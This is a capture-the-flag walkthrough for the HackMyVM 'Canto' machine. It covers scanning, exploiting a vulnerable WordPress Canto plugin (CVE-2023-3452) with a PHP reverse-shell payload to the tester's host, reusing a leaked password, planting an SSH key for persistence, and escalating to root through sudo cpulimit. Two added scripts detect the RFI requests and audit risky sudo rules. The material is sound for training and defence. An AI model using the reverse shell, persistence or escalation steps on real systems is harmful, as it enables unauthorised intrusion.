Canto - hackmyvm

Introduction

Machine name: Canto

Difficulty: Easy

Lab URL: https://hackmyvm.eu/machines/machine.php?vm=Canto

Local environment

Virtualization: VirtualBox

Target IP (Canto): 192.168.130.53

windows_IP: 192.168.130.158

kali_IP: 192.168.130.166

Scanning

Start with nmap

nmap -sT -p0- 192.168.130.53 -oA nmapscan/ports ;ports=$(grep open ./nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports >> nmapscan/tcp_ports;
sudo nmap -sT -sV -sC -O -p$ports 192.168.130.53/32 -oA nmapscan/detail
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 05:55 EDT
Nmap scan report for canto.lan (192.168.130.53)
Host is up (0.00084s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.3p1 Ubuntu 1ubuntu3.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 c6:af:18:21:fa:3f:3c:fc:9f:e4:ef:04:c9:16:cb:c7 (ECDSA)
|_  256 ba:0e:8f:0b:24:20:dc:75:b7:1b:04:a1:81:b6:6d:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.57 ((Ubuntu))
|_http-generator: WordPress 6.5.3
|_http-server-header: Apache/2.4.57 (Ubuntu)
|_http-title: Canto
MAC Address: 08:00:27:73:D7:34 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.95 seconds

HTTP

The site runs WordPress, so try wpscan first

wpscan --url http://192.168.130.53/ --plugins-detection aggressive -e u,ap --api-token=Vjt...
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.130.53/ [192.168.130.53]
[+] Started: Thu Aug  1 09:23:25 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.57 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.130.53/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.130.53/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.130.53/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.130.53/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

Fingerprinting the version - Time: 00:00:02 <==========> (702 / 702) 100.00% Time: 00:00:02
[i] The WordPress version could not be detected.

[+] WordPress theme in use: twentytwentyfour
 | Location: http://192.168.130.53/wp-content/themes/twentytwentyfour/
 | Last Updated: 2024-07-16T00:00:00.000Z
 | Readme: http://192.168.130.53/wp-content/themes/twentytwentyfour/readme.txt
 | [!] The version is out of date, the latest version is 1.2
 | [!] Directory listing is enabled
 | Style URL: http://192.168.130.53/wp-content/themes/twentytwentyfour/style.css
 | Style Name: Twenty Twenty-Four
 | Style URI: https://wordpress.org/themes/twentytwentyfour/
 | Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.130.53/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:01:04 <=====> (106191 / 106191) 100.00% Time: 00:01:04
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] akismet
 | Location: http://192.168.130.53/wp-content/plugins/akismet/
 | Last Updated: 2024-07-10T22:16:00.000Z
 | Readme: http://192.168.130.53/wp-content/plugins/akismet/readme.txt
 | [!] The version is out of date, the latest version is 5.3.3
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/akismet/, status: 200
 |
 | Version: 5.3.2 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/akismet/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/akismet/readme.txt

[+] canto
 | Location: http://192.168.130.53/wp-content/plugins/canto/
 | Last Updated: 2024-07-17T04:18:00.000Z
 | Readme: http://192.168.130.53/wp-content/plugins/canto/readme.txt
 | [!] The version is out of date, the latest version is 3.0.9
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/canto/, status: 200
 |
 | [!] 4 vulnerabilities identified:
 |
 | [!] Title: Canto <= 3.0.8 - Unauthenticated Blind SSRF
 |     References:
 |      - https://wpscan.com/vulnerability/29c89cc9-ad9f-4086-a762-8896eba031c6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28976
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28977
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28978
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24063
 |      - https://gist.github.com/p4nk4jv/87aebd999ce4b28063943480e95fd9e0
 |
 | [!] Title: Canto < 3.0.5 - Unauthenticated Remote File Inclusion
 |     Fixed in: 3.0.5
 |     References:
 |      - https://wpscan.com/vulnerability/9e2817c7-d4aa-4ed9-a3d7-18f3117ed810
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3452
 |
 | [!] Title: Canto < 3.0.7 - Unauthenticated RCE
 |     Fixed in: 3.0.7
 |     References:
 |      - https://wpscan.com/vulnerability/1595af73-6f97-4bc9-9cb2-14a55daaa2d4
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25096
 |      - https://patchstack.com/database/vulnerability/canto/wordpress-canto-plugin-3-0-6-unauthenticated-remote-code-execution-rce-vulnerability
 |
 | [!] Title: Canto < 3.0.9 - Unauthenticated Remote File Inclusion
 |     Fixed in: 3.0.9
 |     References:
 |      - https://wpscan.com/vulnerability/3ea53721-bdf6-4203-b6bc-2565d6283159
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4936
 |      - https://www.wordfence.com/threat-intel/vulnerabilities/id/95a68ae0-36da-499b-a09d-4c91db8aa338
 |
 | Version: 3.0.4 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/canto/readme.txt
 | Confirmed By: Composer File (Aggressive Detection)
 |  - http://192.168.130.53/wp-content/plugins/canto/package.json, Match: '3.0.4'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=============> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] erik
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.130.53/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 3
 | Requests Remaining: 21

The scan shows that the canto plugin is vulnerable; look it up with searchsploit

Nothing more to add here, so go straight to the PoC

CVE-2023-3452

https://github.com/leoanggal1/CVE-2023-3452-PoC

First prepare a PHP file containing a reverse shell

<?php system("bash -c 'sh -i >& /dev/tcp/192.168.130.166/40000 0>&1'");?> 

Then start a listener

 rlwrap -cAr nc -lvvp 40000

Finally, run the PoC against the target

python3 CVE-2023-3452.py -u http://192.168.130.53 -LHOST 192.168.130.166  -s ./shell.php
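
On the defending side, the request pattern behind this step can be hunted in the web server's access log. The following is an added example, not part of the original write-up or of the PoC: it flags requests under /wp-content/plugins/canto/ whose query string carries a remote URL. It assumes Apache combined log format and that the inclusion URL arrives as a query parameter; the file name example.php, the parameter names and the log lines are constructed.

```sh
#!/bin/sh
# Added example: hunt for remote-file-inclusion attempts against the canto
# plugin in an Apache combined-format access log.

# Reads log lines on stdin; prints "client request-target" for each request
# under the plugin directory whose query string has a URL-valued parameter.
detect_canto_rfi() {
    awk '
        {
            target = $7                                    # request target field
            if (index(target, "/wp-content/plugins/canto/") != 1) next
            q = index(target, "?")
            if (q == 0) next                               # no query string
            # Leading "&" lets one pattern match the first parameter too.
            query = "&" tolower(substr(target, q + 1))
            gsub(/%3a/, ":", query)                        # undo percent-encoding
            gsub(/%2f/, "/", query)                        # of "://"
            if (query ~ /&[^=&]*=(https?|ftp):\/\//)
                print $1, $7
        }'
}

# Constructed log lines; example.php and the parameter names are hypothetical.
sample_access_log() {
    cat <<'EOF'
192.168.130.166 - - [01/Aug/2024:09:24:31 -0400] "GET /wp-content/plugins/canto/readme.txt HTTP/1.1" 200 4096 "-" "WPScan v3.8.25"
192.168.130.166 - - [01/Aug/2024:09:41:02 -0400] "GET /wp-content/plugins/canto/example.php?p=http://192.168.130.166:8080 HTTP/1.1" 200 0 "-" "python-requests"
192.168.130.158 - - [01/Aug/2024:09:42:10 -0400] "GET /wp-content/plugins/canto/example.php?a=1&p=HTTP%3A%2F%2F192.168.130.166%3A8080 HTTP/1.1" 200 0 "-" "curl"
192.168.130.158 - - [01/Aug/2024:09:43:55 -0400] "GET /wp-content/plugins/canto/example.php?size=large&id=42 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.168.130.158 - - [01/Aug/2024:09:44:20 -0400] "GET /index.php?next=http://192.168.130.53/ HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
EOF
}

sample_access_log | detect_canto_rfi
```

Only the plain and the percent-encoded URL requests under the plugin directory are reported; the readme fetch, the ordinary parameters and the URL-valued parameter outside the plugin path are not.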

Privilege escalation

Backups

A backup file containing credentials is found under /var/wordpress/backups

www-data@canto:/var/wordpress/backups$ su erik
su erik
Password: th1sIsTheP3ssw0rd!

erik@canto:/var/wordpress/backups$ cd
cd
erik@canto:~$ ls
ls
notes  user.txt
erik@canto:~$ id
id
uid=1001(erik) gid=1001(erik) groups=1001(erik)

Privilege escalation succeeded; user.txt obtained

While here, upload a public key to keep access

erik@canto:~$ ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
...
erik@canto:~/.ssh$ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK5sWbMpzoFOhxwVIjKUYvvMce5kR6XSmnTp7u2TlCmW kali@kali" > authorized_keys

sudo privilege escalation

Check privileges with sudo -l

erik@canto:/$ sudo -l
Matching Defaults entries for erik on canto:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User erik may run the following commands on canto:
    (ALL : ALL) NOPASSWD: /usr/bin/cpulimit

GTFOBins has a one-line escalation for this

erik@canto:/$ sudo /usr/bin/cpulimit -l 100 -f /bin/bash
Process 3024 detected
root@canto:/# cd
root@canto:~# id
uid=0(root) gid=0(root) groups=0(root)
root@canto:~# ls
root.txt  snap
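
The sudo rule above is what an audit should catch before an attacker does. The following is an added example, not part of the original write-up: it reads `sudo -l` output and reports passwordless rules for binaries whose purpose is to start another program. The launcher list and the sample input are constructed and deliberately short; only cpulimit comes from this page.

```sh
#!/bin/sh
# Added example: audit `sudo -l` output for passwordless rules on launchers.

# Constructed sample list, not a complete catalogue: binaries whose job is to
# start another program, so a sudo rule for them is a rule for any command.
LAUNCHERS="cpulimit env nice timeout ionice"

# Reads `sudo -l` output on stdin; prints one finding per risky rule.
audit_sudo_l() {
    awk -v launchers="$LAUNCHERS" '
        BEGIN { n = split(launchers, l, " "); for (i = 1; i <= n; i++) risky[l[i]] = 1 }
        /NOPASSWD:/ {
            rule = $0
            sub(/^.*NOPASSWD:[ \t]*/, "", rule)      # keep the command list only
            m = split(rule, cmds, /,[ \t]*/)
            for (j = 1; j <= m; j++) {
                split(cmds[j], words, " ")           # words[1] is the binary path
                k = split(words[1], parts, "/")
                base = parts[k]                      # file name without directory
                if (words[1] == "ALL")
                    print "CRITICAL NOPASSWD ALL"
                else if (base in risky)
                    print "HIGH NOPASSWD launcher " words[1]
            }
        }'
}

# Constructed input modelled on the sudo -l output shown above.
sample_sudo_l() {
    cat <<'EOF'
User erik may run the following commands on canto:
    (ALL : ALL) NOPASSWD: /usr/bin/cpulimit
    (root) NOPASSWD: /usr/bin/systemctl status apache2, /usr/bin/timeout
    (root) /usr/bin/env
EOF
}

sample_sudo_l | audit_sudo_l
```

The password-protected env rule is not reported, because the check is scoped to NOPASSWD entries; on a real host, pipe `sudo -l -U <user>` into `audit_sudo_l` for each account.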

End
